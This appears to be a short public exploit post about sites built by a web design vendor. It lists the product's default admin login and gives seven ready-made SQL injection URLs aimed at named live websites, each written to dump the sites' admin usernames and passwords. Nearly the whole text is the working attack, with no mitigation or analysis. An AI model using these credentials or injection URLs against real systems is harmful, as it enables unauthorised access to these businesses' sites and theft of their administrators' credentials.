######################
Exploit Title : chiangmaizone Design Default Admin Password
Exploit Author : Behrouz Mansoori
Vendor Homepage : https://www.chiangmaizone.com
Date: 2020-08-24
Tested On : Win 10 / Mozilla Firefox
######################
#
# username : admin
# password : @admin
#
######################
# demo 1 :
https://www.chiangmaivantravel.com/places_detail.php?id=-5%27%20union%20select%201,2,unhex(hex(group_concat(username,%27:%27,password))),4,5,6,7%20from%20admin_user--+
# demo 2 :
https://www.phraetravel.com/tours_package_de.php?id=-16%27%20union%20select%201,2,3,4,unhex(hex(group_concat(username,0x3a,password))),6,7,8,9,10,11,12,13,14,15%20from%20admin_user--+
# demo 3 :
https://www.likidsilp.com/Product-detail.php?id=-187%27%20union%20select%201,2,3,4,5,unhex(hex(group_concat(username,0x3a,password))),7,8,9,10,11,12,13,14%20from%20admin_user--+
# demo 4 :
https://www.intothewildelephantcamp.com/gallery-detail.php?id=-26%27%20union%20select%201,unhex(hex(group_concat(username,%27:%27,password))),3,4,5,6%20from%20admin_user--+
# demo 5 :
https://www.viangbua.com/booking.php?id=-21%27%20union%20select%201,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6,7,8,9,10,11,12%20from%20admin_user--+
# demo 6 :
https://www.gingerbreadcafe.net/menu_de.php?id=-6%27%20union%20select%201,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6,7,8,9%20from%20admin_user--+
# demo 7 :
https://krupayuswim.com/news.php?id=-4%27%20union%20select%201,2,3,4,unhex(hex(group_concat(username,0x3a,password))),6,7,8,9,10,11,12%20from%20admin_user--+
######################
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
######################